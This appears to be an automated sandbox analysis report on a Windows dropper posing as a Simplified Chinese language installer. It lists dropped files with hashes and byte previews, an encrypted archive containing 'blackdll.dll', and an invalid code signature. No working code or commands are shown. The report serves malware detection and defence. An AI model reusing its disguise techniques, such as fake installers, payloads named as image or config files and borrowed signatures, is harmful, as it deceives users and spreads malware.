C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\md5.ini

Download File

Process:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
File Type:	PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	612851
Entropy (8bit):	7.995836061027938
Encrypted:	true
SSDEEP:	12288:tiTfEJiX3KaRppbIazq6/Fx6hda4oOoPg8U4CMt7O3wScRsr2:WX3KeDX6hAOo7x0wHRI2
MD5:	4E8D617328FBCD6F8CBD1FF460C0EB6D
SHA1:	D7381BAEDFC81FBCB84C8955DEA3A54CE138CDCB
SHA-256:	32820907D06BF1DE5FA281D501EB772F2684C4E152E8E45E71F3676A9D7FB6EB
SHA-512:	47376675EA3485B2E43238A5FCDEA66ECE9DC94CF90FF803D1FE92819781D2C31245F55FCDD03F1D4E7D080EB5215D648147C3C6E8DA91C34139DF725FDCC725
Malicious:	false
Preview:	.PNG........IHDR...]................pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx..W.$;.%..={...b.2.p.....+.euO1_.07..Ah........#D "b&"&.G"".c.1@...>33.~%".j&....{eK../.ML..9...t..5.3.Hd... ..[.....i..T..]... &f.....L..cP.OG...%.......>....D..g"..W.gV.. ..""..1+.^.....{T.......J...>.!.....yq.N../..f.6../...4.EL{0.@7L"F.(ha.y.A..1V....B.L.V..g.D..vs..<t ..'..~`.q!..p!$.zD$d.IB...Y.~..B......>...w......9...`..<..EA.....0./....`....BoI..^p!.h....h.<.....Ls%..g.\.C.i~,.\|Uh.VTq.1F.7..{-.6..-.....I....Z...%)C.\l\.yoX.KT.....?..k.......9....r..>l.......Z5?..+.\.P1.....!...L6....'.( ....33.$$.......h..1Q.r.e4...IhFI.Z........"d .^.0q.KQ..j..W........#....W..D..0K..h...K.........#MqW3]...\q{..*....R.m...H..."..a6O...pNs._N.......I1.@Nc.}.W0}.... b83.2.b...c.......jod5<F.o@5..Wc.4.Ekr.e.?dXb. .H=..PFU,..(..4....D.uk!lp.P.....(E}.r.......<.9.?.}.....i(.....t.&x.`_e..}./.i.SZ.....;..md'X._...Q..........j..:.G...../6...H..DJ......k..`.a.9..

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\vcruntime140_1.dll

Download File

Process:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	6.675573056871668
Encrypted:	false
SSDEEP:	768:oPIyGVrxmKqOnA4j3z6S2X7pudLAivD9zigElY7ivD9zG:XBr87uWFLpudBvpziZ1vpzG
MD5:	EB49C1D33B41EB49DFED58AAFA9B9A8F
SHA1:	61786EB9F3F996D85A5F5EEA4C555093DD0DAAB6
SHA-256:	6D3A6CDE6FC4D3C79AABF785C04D2736A3E2FD9B0366C9B741F054A13ECD939E
SHA-512:	D15905A3D7203B00181609F47CE6E4B9591A629F2BF26FF33BF964F320371E06D535912FDA13987610B76A85C65C659ADAC62F6B3176DBCA91A01374178CD5C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...\|!..{.&.\|!..{...\|!..Rich}!..................PE..d.....=..........." ...&.<...8.......B....................................................`A........................................Pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\8cb0240ffaae4\MSVCP140.dll

Download File

Process:	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	627992
Entropy (8bit):	6.360523442335369
Encrypted:	false
SSDEEP:	12288:dO93oUW7jh6DN0RUhsduQjqDZ6X/t5mTOKGmJ7DseBiltBMQEKZm+jWodEEVoFt:s3oUW7jh6DN0RUhsduQjqDZ6X/t5mTOo
MD5:	C1B066F9E3E2F3A6785161A8C7E0346A
SHA1:	8B3B943E79C40BC81FDAC1E038A276D034BBE812
SHA-256:	99E3E25CDA404283FBD96B25B7683A8D213E7954674ADEFA2279123A8D0701FD
SHA-512:	36F9E6C86AFBD80375295238B67E4F472EB86FCB84A590D8DBA928D4E7A502D4F903971827FDC331353E5B3D06616664450759432FDC8D304A56E7DACB84B728
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..r$..!$..!$..!.O.!&..!-.\|!2..!v.. '..!$..!...!v.. '..!v.. o..!v.. j..!v.. %..!v..!%..!v.. %..!Rich$..!................PE..d.....0].........." .........`...... ...............................................T.....`A............................................h....................0..t@...T...A..............8............................................ ..........@....................text...<........................... ..`.rdata..<.... ......................@..@.data....;..........................@....pdata..t@...0...B..................@..@.didat..h............B..............@....rsrc................D..............@..@.reloc...............H..............@..B................................................................................................................................................................................................................

C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe

Download File

Process:	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	350096
Entropy (8bit):	7.630283831051942
Encrypted:	false
SSDEEP:	6144:nphNs2MKLxQ7IxCImChLPAonfhEdD/iyqZFVvDrGcU5mMOgMdPr2KGyyGC:nN+KLxnCLChLPAcfM/mVxz5dP/la
MD5:	58B4104495B166543884397497FE2243
SHA1:	82C6D3104F59583E401A70BA15A9C68F79DD7909
SHA-256:	873DF30B92204204D860152CBC6784E167A78DDBD643BBEC918F314AAFEC3F2B
SHA-512:	A8A792DB792019F48D112A2F330845D66D45372D31642A3993CA3354BBFAB9AB0004C2F2F4B7949263755CD664CBDB400D7B3C5190ECF19BBFFC79D2880D5E47
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......BVE..7+..7+..7+.MO(..7+.MO...7+.MO/..7+...(..7+.../..7+......7+.M...7+.MO..7+..7*.\7+.M....7+.M.+..7+.M...7+.M.)..7+.Rich.7+.................PE..d...F}kg.........."....).....d......`..........@.............................`............`..........................................n......4o..<.......x............$...3...P..`...@Y..T............................X..@...............P............................text............................... ..`.rdata..............................@..@.data................j..............@....pdata...............v..............@..@.rsrc...x...........................@..@.reloc..`....P......................@..B................................................................................................................................................................................................................................

C:\Users\user\8cb0240ffaae4\UnityPlayer.dll

Download File

Process:	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	218673040
Entropy (8bit):	0.11840890661536389
Encrypted:	false
SSDEEP:
MD5:	B58807FC21A776C5BEE9312EC3DD6123
SHA1:	88C8439F5DD7BF674C4006D0234CED02FB6C324D
SHA-256:	0407175091BF1E110223C7938C1A4DB619B74BE8CFF1ABECA79C7B7C476DB364
SHA-512:	CEF386466F558825890FE45935D17D48D0F71FDF16EE77D3DD866098FB518C2BA4DD3AEB2A55EF91E30913789B1028861BBFCD6EB262EDCB356B3F565CCFE7C6
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........p.................9......9......9......9.....Z9...............................9...........Z9.....Z9.....Z9.....Rich...........................PE..d....~.g.........." ...*..................................................................`.........................................p...L.......h............`...#...n...A...........N..8...........................PM..@............................................text............................... ..`.rdata..,...........................@..@.data...p...........................@....pdata...#...`...$...F..............@..@.reloc...............j..............@..B................................................................................................................................................................................................................................................

C:\Users\user\8cb0240ffaae4\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119376
Entropy (8bit):	6.605105564769165
Encrypted:	false
SSDEEP:	1536:BqvQFDdwFBHKaPX8YKpWgeQqbekRG7MP4ddbHecbWcmpCGtodMzDZ92zfa:BqvQFDUXqWn7CkRG7jecbWb9toaera
MD5:	E9B690FBE5C4B96871214379659DD928
SHA1:	C199A4BEAC341ABC218257080B741ADA0FADECAF
SHA-256:	A06C9EA4F815DAC75D2C99684D433FBFC782010FAE887837A03F085A29A217E8
SHA-512:	00CF9B22AF6EBBC20D1B9C22FC4261394B7D98CCAD4823ABC5CA6FDAC537B43A00DB5B3829C304A85738BE5107927C0761C8276D6CB7F80E90F0A2C991DBCD8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.... ............" ...&. ...d.......................................................:....`A.........................................e..4...4m..........................PP...........N..p............................L..@............0...............................text...V........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

C:\Users\user\8cb0240ffaae4\static.ini

Download File

Process:	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
File Type:	PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	621778
Entropy (8bit):	7.995971739684217
Encrypted:	true
SSDEEP:	12288:tiTfEJiX3KaRppbIae7efufrAWreH+9ILv9RCSfPBfBj6x4OJuzfv7tw:WX3KeeKWqH+CvCSHBfVIwzfvhw
MD5:	F34C7CD0424C682FDD27F13F7BDD7733
SHA1:	95BA19FEDAD0FE0CCF9152860531A307A2779B16
SHA-256:	29EDD323DBE4EB8C5B566A2F7B867760B49940DDE90A9C533878B354859DD403
SHA-512:	7E4323E55009D2FB0BF0ED241106BDC0D9D5C51983EF5E078B7A5E23697A96A4232298CCD98D9D805680CE2F4FE76A6D60BA51D72B39DF3F3818D1A8EF7781FF
Malicious:	false
Preview:	.PNG........IHDR...]................pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx..W.$;.%..={...b.2.p.....+.euO1_.07..Ah........#D "b&"&.G"".c.1@...>33.~%".j&....{eK../.ML..9...t..5.3.Hd... ..[.....i..T..]... &f.....L..cP.OG...%.......>....D..g"..W.gV.. ..""..1+.^.....{T.......J...>.!.....yq.N../..f.6../...4.EL{0.@7L"F.(ha.y.A..1V....B.L.V..g.D..vs..<t ..'..~`.q!..p!$.zD$d.IB...Y.~..B......>...w......9...`..<..EA.....0./....`....BoI..^p!.h....h.<.....Ls%..g.\.C.i~,.\|Uh.VTq.1F.7..{-.6..-.....I....Z...%)C.\l\.yoX.KT.....?..k.......9....r..>l.......Z5?..+.\.P1.....!...L6....'.( ....33.$$.......h..1Q.r.e4...IhFI.Z........"d .^.0q.KQ..j..W........#....W..D..0K..h...K.........#MqW3]...\q{..*....R.m...H..."..a6O...pNs._N.......I1.@Nc.}.W0}.... b83.2.b...c.......jod5<F.o@5..Wc.4.Ekr.e.?dXb. .H=..PFU,..(..4....D.uk!lp.P.....(E}.r.......<.9.?.}.....i(.....t.&x.`_e..}./.i.SZ.....;..md'X._...Q..........j..:.G...../6...H..DJ......k..`.a.9..

C:\Users\user\8cb0240ffaae4\vcruntime140_1.dll

Download File

Process:	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	6.675573056871668
Encrypted:	false
SSDEEP:	768:oPIyGVrxmKqOnA4j3z6S2X7pudLAivD9zigElY7ivD9zG:XBr87uWFLpudBvpziZ1vpzG
MD5:	EB49C1D33B41EB49DFED58AAFA9B9A8F
SHA1:	61786EB9F3F996D85A5F5EEA4C555093DD0DAAB6
SHA-256:	6D3A6CDE6FC4D3C79AABF785C04D2736A3E2FD9B0366C9B741F054A13ECD939E
SHA-512:	D15905A3D7203B00181609F47CE6E4B9591A629F2BF26FF33BF964F320371E06D535912FDA13987610B76A85C65C659ADAC62F6B3176DBCA91A01374178CD5C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...\|!..{.&.\|!..{...\|!..Rich}!..................PE..d.....=..........." ...&.<...8.......B....................................................`A........................................Pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\8cb0240ffaae4\view.res

Download File

Process:	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
File Type:	PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	377024
Entropy (8bit):	7.989692875635462
Encrypted:	false
SSDEEP:	6144:7piTBrVIz5riKchYiO74nKaQ5DqeipZxIa3voRkdgMXzkGUqJ3nf++40z+ADbKIP:tiTfEJiX3KaRppbIa3vrXXUqR/40znD1
MD5:	2DF7083228B9D5BC179F195103D5F0C1
SHA1:	29E2183EA54173DC4B6B165867EDD656270688D7
SHA-256:	739C9C3C5566805C8B0ECD9729E215F2CE47BFC4B8EA111E1D1F0BF8F4FB4F48
SHA-512:	6C636A038957CDD098A92BD91C614B0A88A6D4EEB51B49A8FD0D2E3C274A295C6D95C28694E653D3A20EA95E0E5A414922AB5D8855C956E701FCF21836A934DE
Malicious:	false
Preview:	.PNG........IHDR...]................pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx..W.$;.%..={...b.2.p.....+.euO1_.07..Ah........#D "b&"&.G"".c.1@...>33.~%".j&....{eK../.ML..9...t..5.3.Hd... ..[.....i..T..]... &f.....L..cP.OG...%.......>....D..g"..W.gV.. ..""..1+.^.....{T.......J...>.!.....yq.N../..f.6../...4.EL{0.@7L"F.(ha.y.A..1V....B.L.V..g.D..vs..<t ..'..~`.q!..p!$.zD$d.IB...Y.~..B......>...w......9...`..<..EA.....0./....`....BoI..^p!.h....h.<.....Ls%..g.\.C.i~,.\|Uh.VTq.1F.7..{-.6..-.....I....Z...%)C.\l\.yoX.KT.....?..k.......9....r..>l.......Z5?..+.\.P1.....!...L6....'.( ....33.$$.......h..1Q.r.e4...IhFI.Z........"d .^.0q.KQ..j..W........#....W..D..0K..h...K.........#MqW3]...\q{..*....R.m...H..."..a6O...pNs._N.......I1.@Nc.}.W0}.... b83.2.b...c.......jod5<F.o@5..Wc.4.Ekr.e.?dXb. .H=..PFU,..(..4....D.uk!lp.P.....(E}.r.......<.9.?.}.....i(.....t.&x.`_e..}./.i.SZ.....;..md'X._...Q..........j..:.G...../6...H..DJ......k..`.a.9..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe.log

Download File

Process:	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1541
Entropy (8bit):	5.372262602769933
Encrypted:	false
SSDEEP:	48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0H1HTHKcEj:Pq5qHwCYqh3oPtI6eqzxVzqcEj
MD5:	00320FE604138103A2BC2AE16558C0F9
SHA1:	D2A05F4FCF9DCAABC8751BD8809553DEC6D5771B
SHA-256:	C5C0F032A57A4F7910297CBCBBD02BD6D2BAB96A8710897B2DEA2021919CA057
SHA-512:	F951C93C2A06DE8370A344A97E837F9605A220B10C501EFAB5E98C32FA556BEE373B66B4F8C983DEAD66BDEC047AF772D062E28D84F9E8FC0DF98DD120F575B6
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\NOT-UTG-Q-1000.dat

Download File

Process:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
Category:	dropped
Size (bytes):	1339065
Entropy (8bit):	7.999862897846976
Encrypted:	true
SSDEEP:	24576:5+X4t9ulIE+N5nxDQ/q2IKNPsd8sp4GXm69egpaHfHyMPjqCwc:cX4t9ulIE+FDii8sp4CF9eq0KMmA
MD5:	ABB2F4EA028EA64EDB9480D5F62B9C43
SHA1:	E9A0853BA343A9E947C3F92D1548CAA9C7115297
SHA-256:	64EA534EB69FD3B3B939CC35438E5D064110E6A0E3C437965693A9A694D0B40C
SHA-512:	E9F3A026710196A52237AD914C95141DDBE2B4DCE90D490D8C820C9EC5D1A187326840953C724C7C0CA085879547B0EECF3E22392F255E471540662DE8C1FA77
Malicious:	false
Preview:	PK......c.bumZ..E.....Q......blackdll.dll......AE..._.~al.1...%...0J. ,}0w21...{...zu...l......77.z......v...".'....v)..BS...G.h...~%...../.zV......a.w...h.n#..^...-...@C.0y...a.2Y.H.....{A.....j.=........a..U.(p...a..g..5...`.%].$...X].x......W...._.E..Y.O<..Ts.M&.j.....D..).?......7..!....s.>\|l.r.m.Mt.i.Z<Xnti,..E.i8.N./.]...~.......~.......ww....\|T..5..+7...[)../....D...+...3.s..xD.6HS.(..w..{tM.3.'....FX...vF.u.h]...x#".,.1^...\.U$Pb).....hs^.B..\...>...Y]S.2......L+.&y.\|..+"..4..'..dbM.l.e.xzM.}.{..y..\|......#.t.DV..e...T.Ch..4.}Y...z/.:.w..t-...wF.!..Z...).b.t9F4..^T..d..9..Z.~..4...........s .'7....gG\|RI.,..01...lO7.&H..iTA.vU.=$C....).m.n.j...%..,#kO....J$..9'.ZY&........>..`K.1...v.h...?r%..&.cN.a............"...\........@.....K.....1.U:........+.........6.ZQK..K.Hs.......v...@.K....m.T..\.BN...D.\|....q...Z...g..R`3........<A.Pw.nS.[5x...U..._'...)y.B..\.a.Y........P.JK.C.\|^.o}..Z.D".G8wqL0..X.....$....X0.V..i.f..>...s.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.320006336310889
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
File size:	469'104 bytes
MD5:	43cc53fa23d293cfbe704eab6eafb042
SHA1:	27c1ac5e0490a7e1c03677fbeecc05eded2acf4e
SHA256:	8eb94aac55dcfaa3f125994a9bc6d70dfa3ef44c515525e6b7c6e4598442a4fd
SHA512:	4f64d17820385a2a7760a1b11dfe52bd77b7c13330caf4495be1d1437e49b6407c73320c8d72e2becbddbfdea37c55052787530b915bc959550fb8b667e76294
SSDEEP:	6144:8+EVb6zslTwelTJ4RZOHkRl6+0E1JopxLrvGU2UmvEJ7Ia61Z4xLSSzSdzUR:FyWzswmzYJo3HvWUmvmI4kwR
TLSH:	ABA47C59F6248475E067A134C8E74642E3F13C9A5731978B22E62E2E3F37FA1593E321
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............N.... ... ....@.. .......................@......*.....`................................

File Icon


Icon Hash:	113c0c2d3c3d3c0d

Static PE Info

General

Entrypoint:	0x46194e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xA0DFE294 [Mon Jul 12 17:44:52 2055 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	09/08/2021 20:00:00 19/08/2023 19:59:59
Subject Chain	CN="Hithink RoyalFlush Information Network Co., Ltd.", O="Hithink RoyalFlush Information Network Co., Ltd.", L=\u676d\u5dde\u5e02, S=\u6d59\u6c5f\u7701, C=CN, SERIALNUMBER=9133000070337747XE, OID.1.3.6.1.4.1.311.60.2.1.2=\u6d59\u6c5f\u7701, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	EC4407EDBFAFE67C61F9D643443E615C
Thumbprint SHA-1:	E589D8574562829B67047C6767BC3C57883A29D8
Thumbprint SHA-256:	3988ED3A9DC4A181DCCC8EA2B7BBFBD35118315F03C15D9B9FA79B8E65CD97E9
Serial:	089FD5838B30582861F0ED446C277C68

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x618fc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0xe433	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x6e400	0x4470
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x618e0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5f954	0x5fa00	0fb726f24a60b33a0fd6f0cb93417ab9	False	0.4134548611111111	data	6.314448041237541	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x62000	0xe433	0xe600	c7003cb692b9114e78a055c518de6604	False	0.4066745923913043	data	5.053125573012406	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0xc	0x200	187224369f7eb30ac4e82a29725734f6	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x623b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors			0.5471748400852878
RT_ICON	0x63260	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.6796028880866426
RT_ICON	0x63b08	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors			0.7125576036866359
RT_ICON	0x641d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors			0.49710982658959535
RT_ICON	0x64738	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.46815352697095436
RT_ICON	0x66ce0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.43808630393996245
RT_ICON	0x67d88	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.6176229508196721
RT_ICON	0x68710	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.6693262411347518
RT_ICON	0x68b78	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.31307053941908713
RT_ICON	0x6b120	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.35892116182572614
RT_ICON	0x6d6c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.3087136929460581
RT_GROUP_ICON	0x6fc70	0x76	data			0.6610169491525424
RT_GROUP_ICON	0x6fce8	0x14	data			1.25
RT_GROUP_ICON	0x6fcfc	0x14	data			1.25
RT_GROUP_ICON	0x6fd10	0x14	data			1.25
RT_VERSION	0x6fd24	0x2c4	data	Chinese	China	0.5805084745762712
RT_MANIFEST	0x6ffe8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347
RT_MANIFEST	0x701d4	0x25f	ASCII text, with very long lines (607), with no line terminators	English	United States	0.43492586490939045

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
CompanyName	(Hexin)
FileDescription
FileVersion	2022.4.28.1
InternalName	E34
LegalCopyright	(C) 2011
OriginalFilename	WeiTuoNew.exe
ProductName
ProductVersion	1.1.4.13
